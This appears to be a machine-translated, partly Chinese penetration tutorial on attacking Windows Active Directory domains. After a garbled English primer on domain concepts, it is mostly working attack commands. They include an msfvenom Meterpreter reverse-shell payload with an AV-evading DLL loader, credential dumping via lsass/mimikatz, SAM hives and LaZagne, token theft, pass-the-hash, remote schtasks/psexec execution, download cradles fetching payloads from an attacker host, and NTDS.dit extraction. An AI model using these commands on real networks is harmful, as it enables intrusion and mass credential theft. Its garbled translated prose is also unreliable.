Domain penetration penetration of the network

1. acquaintance domain environment

What is a domain

Domain is a form of computer network, in which all user accounts, computers, printers and other security principals are registered in a central database on a central computer located in a cluster of one or more known as a domain controller. Authentication on the domain controller. Each person using the computer in the domain will receive a unique user account, you can then access the domain resources allocated to the account. Domains (the Domain) is a multiple computers in a network organized logically together, centralized management, logical this environment is different from the working group is called a domain.

Domain Control

After installed on one machine on Active Directory (Active Directory), this machine was to become a domain controller. In a domain, there may be more than one domain controller, the domain controller, regardless of the primary domain controller and backup domain controller, each domain controller acts as the same character, for example, you have three domain controllers, you can on any domain controller for the user's permission to make changes, your changes will be replicated to other domain controllers in two, so that if a domain controller fails, as long as other domain controllers still work properly, the whole domain can still operate normally.

Active Directory (Active Directory)

Active Directory stores information about network objects and allows administrators and users to easily find and use this information, these objects can be users, groups, computers, control station, mail, profile, organizational unit, and so wash tree .

Domain Users

Users in a domain environment, user name and password on the domain controllers need to be verified, verification can log on any machine domain through the domain users. But the domain user just an ordinary user can only log on to the domain machine to view, can not make any changes.

Domain tube

Domain administrators can log on to a domain controller, controls all rights, such as rights to any machine in the domain to be modified, domain administrators have the right to send any mission or policy domain all machines, it has an absolute domain control.

组 (gurup)

Many employees in the company's rights are the same, this is because the domain administrator user domain were grouped about to different users into different groups, and then to a group permission settings, thus avoiding the management members need to be troublesome for each user rights assignments alone.

Trusted domain (trust)

In the actual case, in a big company and there will be some of the following subsidiaries, would have resulted in a parent domain, Subsidiaries have a separate domain, then how will the domain contact the domain of the parent company and its subsidiaries together? We can build a relationship of trust (trust) between them, if you want the parent domain account logon domain subsidiaries, the domain subsidiary of the parent company must establish a trust relationship domain. When the parent domain account you want to log on to the domain subsidiaries, affiliates due to the trust domain of the parent domain, the domain will listen to subsidiaries of parent access key to return the domain controller in the domain. As the parent domain domain subsidiaries did not establish a trust relationship, the domain account is a subsidiary of the parent company can not log on to the domain.

/ Domain_trusts view a list of trusted domains, we often use trust relationships within the domain of horizontal penetration to build on this.

2. Domain Information Collection

1.nltest trusted domain

nltest tool that comes with the system after the 2003 general domain controller are built on the primary dns server, because he wants to resolve domain names. We can nltest query in the working group, within the network query whether some domain environments.

1. Find the domain controller

ifconfig /all

2. Find a trusted domain

nltest /domain_trusts /all_trusts /v /server:192.168.0.130

3. Find a trusted domain corresponding IP

nltest /dsgetdc:XXXXXX /server:192.168.0.130

4.nltest command:
Reference:
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731935(v=ws.11 )
https://blog.csdn.net/weixin_34377065/article/details/85597188

2. Domain Information Collection

1.csvde

csvde is windows server 2008 built-in command line tool, located in the% windir% / system32 directory.
If you install the AD DS or Active Directory Lightweight Directory Services (AD LDS) server role, this feature is available.

The tool is suitable for:

windows server 2003
windows server 2008
windows server 2003 R2
windows server 2008 R2
windows server 2012

csvde -setspn payload -f C:\windows\temp\payload.csv

查看payload.csv
LDAP的存储规则(类似于一个数据库)，用来存储域相关信息。

区分名（DN，Distinguished Name）一个条目的区分名称叫做“dn”或者叫做区分名。在一个目录中这个名称总是唯一的。
CN=Common Name 为用户名或服务器名，最长可以到80个字符，可以为中文；
OU=Organization Unit为组织单元，最多可以有四级，每级最长32个字符，可以为中文；
O=Organization 为组织名，可以3—64个字符长
C=Country为国家名，可选，为2个字符长

2.setspn

SPN 官方名称为“服务主体名称”，本质上存储的是域内各种服务资源的对应关系。如，对应的服务类型叫什么，机器名是什么，服务端口号是多少等等。我们借助SPN可以快速定位当前目标域中所有存活的各类主机。

setspn -T payload -Q */*

setspn -T payload -Q */* | findstr SQL

通过上面收集到的主机信息，我们就可以使用域管理员账户去登录各目标系统进行查看。

3.dnsdump

https://github.com/dirkjanm/adidnsdump
dnsdump -u 域名\域用户 -p 域密码域控服务器名

dnsdump -u payload\Micr067 -p admin@123 WIN-DC.payload.com

https://github.com/3gstudent/Homework-of-Powershell/blob/master/dns-dump.ps1

Powershell -ep bypass -f dns-dump.ps1 -zone payload.com

4.net

net user /domain  获取域用户列表
net group "domain admins" /domain  获取域管理员列表
net group "domain controllers" /domain 查看域控制器(如果有多台) net group "domain computers" /domain 查看域机器 net group /domain 查询域里面的组

5.net view

Net view 查看同一域内机器列表
net view \\ip 查看某IP共享
Net view \\GHQ 查看GHQ计算机的共享资源列表 net view /domain 查看内网存在多少个域 Net view /domain:XYZ 查看XYZ域中的机器列表

6.nbtscan

nbtscan.exe 192.168.0.1/24
DC 是域控服务器

3.域渗透思路

横向渗透---权限维持---抓取密码(获取域用户账号密码)---域信息收集---获取域管权限---拿下域控

1.弱口令爆破

超级弱口令工具 https://github.com/shack2/SNETCracker

2.dll加载shellcode免杀上线

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp_uuid LPORT=1521 LHOST=192.168.245.129 -e x86/shikata_ga_nai -i 11 -f c -o shellcode.c
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp_uuid
msf > set lhost 192.168.245.129
msf > set lport 1521 msf > set EnableStageEncoding true msf > set StageEncoder x86/fnstenv_mov msf > exploit

将c程序编译为dll文件，在目标机器上运行即可。

#include <Windows.h>
extern "C" _declspec(dllexport) void __cdecl test(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine,int nCmdShow) { MessageBox(NULL,L"_Title_",L"Hello",MB_OK); unsigned char buf[] = "........替换生成的shellcode..........."; void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, buf, sizeof buf); ((void(*)())exec)(); return; }

mingw下载：https://osdn.net/projects/mingw/downloads/68260/mingw-get-setup.exe/
MinGW安装和使用 https://www.cnblogs.com/qcssmd/p/5302052.html

3.注册表读取密码

// 获取注册表信息

reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv
reg save HKLM\SAM c:\windows\temp\Sam.hiv

// mimikatz运行解密命令

lsadump::sam /sam:Sam.hiv /system:Sys.hiv

5.Dump lsass进程内存获取hash

procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp

// 在mimikatz中运行，结果保存在日志里

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

6.LaZagne读取密码。

项目地址：https://github.com/AlessandroZ/LaZagne

LaZagne.exe all   执行所有模块，获取全部密码信息

7.利用token复制获取system权限

incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

8.凭证窃取

通过tasklist /v查看进程用户，如果有域用户启的进程，则可以窃取域管凭证

incognito下载地址：https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip
查看保存的凭证
```
incognito.exe list_tokens -u
```

窃取域管凭证

incognito.exe execute -c "payload\Administrator" cmd.exe

查看本地保存的凭证，可以看到有域管理员的凭证存在成功窃取到域管理员的凭证，利用窃取的凭证我们可以查看域控上的保存的服务资源。

4.命令行渗透

远程登陆桌面增加暴露风险
目标管理员可能禁用对服务器远程登陆。

1.IPC$

建立ipc连接之后就可以访问目标机器的文件，可以进行上传、下载等操作，也可以在目标机器上运行命令。上传下载使用copy命令。

先建立IPC连接

net use \\192.168.245.130 /u:payload\administrator

复制文件到目标
```
copy shell.msi \\192.168.245.130\C$
```

复制目标机器文件到本地
```
copy \\192.168.52.2\C$\shell.msi
```

2.sc计划任务

• sc /create /tn task1 /U 域\域用户 /P 域用户密码 /tr 执行的命令或者bat路径 /sc ONSTART /s 域机器IP /RU system • sc /run /tn task1 /s 域机器IP /U 域\域用户 /P 域用户密码 • sc /F /delete /tn task1 /s 域机器IP /U 域\域用户 /P 域用户密码

schtasks /create /tn task1 /U payload\administrator /P qwer1234! /tr "c:\windows\system32\cmd.exe /c net user > c:\\windows\\temp\\1.txt" /sc ONSTART /s 192.168.245.130 /RU system
schtasks /Run /tn task1 /s 192.168.245.130 /U payload\administrator /P qwer1234!
schtasks /F /delete /tn task1 /s 192.168.245.130 /U payload\administrator /P qwer1234!
type \\192.168.245.130\C$\windows\temp\1.txt

3.psexe获取system权限

使用psexec之前先建立IPC连接
• net use \\192.168.245.130 /u:payload\administrator
• PsExec.exe \\192.168.245.130 -s cmd.exe -accepteula
• –accepteula 第一次运行会弹框,输入这个参数便不会弹框。
• -s 以 “nt authority\system” 权限运行远程进程
成功返回域控服务器system权限的命令行

4.hash传递

工具下载：https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

psexec.exe -hashes :用户Hash 域名/用户名@目标IP
psexec.exe -hashes :6912928308e3cda903e6d75bd6091a20 payload/administrator@192.168.245.130

5.windows命令行下载文件

powershell

powershell (new-object Net.WebClient).DownloadFile('http://192.168.245.132/a.ps1','D:\phpstudy\WWW\a.ps1')

适用于windows 7以上版本。

certutil
```
certutil.exe -urlcache -split -f http://192.168.245.132/msg.dll msg.dll 
certutil.exe -urlcache -split -f http://192.168.245.132/msg.dll delete
```
certutil适用于server 2003以上版本详情参考： https://docs.microsoft.com/en-us/previous-versions/orphan-topics/ws.10/cc773087(v=ws.10)?redirectedfrom=MSDN
Bitadmin
```
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.245.132/b.ps1" "D:\\phpstudy\\WWW\\b.ps1"
```
Bitadmin适用于windows 7以上版本。详情参考： https://docs.microsoft.com/zh-cn/windows/win32/bits/bitsadmin-tool?redirectedfrom=MSDN

vbs
第一种,直接echo输入download.vbs。

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.245.132/a.ps1",0 >>download.vbs echo Post.Send() >>download.vbs echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs echo aGet.Mode = 3 >>download.vbs echo aGet.Type = 1 >>download.vbs echo aGet.Open() >>download.vbs echo aGet.Write(Post.responseBody) >>download.vbs echo aGet.SaveToFile "D:/a.ps1",2 >>download.vbs

第二种,保存脚本后再下载指定文件。

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs cscript downfile.vbs http://192.168.245.132/a.ps1 D:\\tomcat8.5\\webapps\\x.ps1

Windows下载执行命令大全：
https://xz.aliyun.com/t/1654#toc-6

6.获取内网代理

内网有些资源需要指定的代理才能访问,我们可以通过读取注册表信息查找代理IP和端口信息。
注册表查看IE代理

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" reg query "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL

7.windows API利用

工具使用前提先需要建立IPC连接
NetGroupGetUsers.exe：查询目标服务器本地管理组的成员
NetLocalGroupGetMembers.exe：查询域里的各个组里的成员，IP必须是域控IP，域用户随意
NetUserEnum.exe：查询目标服务器所有用户，包括隐藏用户

8.导域hash

windows的密码以hash的形式存储在SAM文件中的。
域里面存储信息的数据库文件：c:\windows\ntds\ntds.dit
ntds.dit其实就是个数据库，微软本身就有一系列的文档化api能够操作这个数据库，链接是： https://msdn.microsoft.com/en-us/library/windows/desktop/gg294074.aspx。
使用创建快照的方式导出ntds.dit文件

创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

挂载快照

ntdsutil snapshot "mount {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit

复制ntds.dit

copy C:\$SNAP_201911241434_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit

卸载快照

ntdsutil snapshot "unmount {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit

删除快照

ntdsutil snapshot "delete {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit

获取key
```
reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv
```
使用NTDSDumpEx获取所有域用户的Hash
```
NTDSDumpEx.exe -d ntds.dit -o hash.txt -s sys.hiv -h
```
NTDSDumpEx.exe下载地址：https://github.com/zcgonvh/NTDSDumpEx